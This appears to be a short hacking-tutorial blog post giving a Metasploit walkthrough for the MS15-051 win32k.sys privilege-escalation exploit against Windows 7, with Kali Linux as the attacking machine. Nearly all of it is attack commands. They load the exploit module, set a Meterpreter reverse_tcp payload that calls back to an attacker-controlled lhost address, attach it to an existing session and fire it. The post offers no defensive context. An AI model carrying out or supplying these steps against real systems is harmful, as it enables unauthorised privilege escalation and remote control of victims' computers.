This module exploits
improper object handling in the win32k.sys kernel mode driver. This module has
been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2
SP1 x64..
Exploit
Targets
Windows 7
Requirement
Attacker: kali Linux
Victim
PC: Windows 7
Open Kali terminal type msfconsole
Now type use
exploit/windows/local/ms15_051_client_copy_image
msf exploit (ms15_051_client_copy_image)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_051_client_copy_image)>set lhost 192.168.1.5 (IP of Local
Host)
msf exploit (ms15_051_client_copy_image)>set session 1
msf exploit (ms15_051_client_copy_image)>exploit
0 comments:
Post a Comment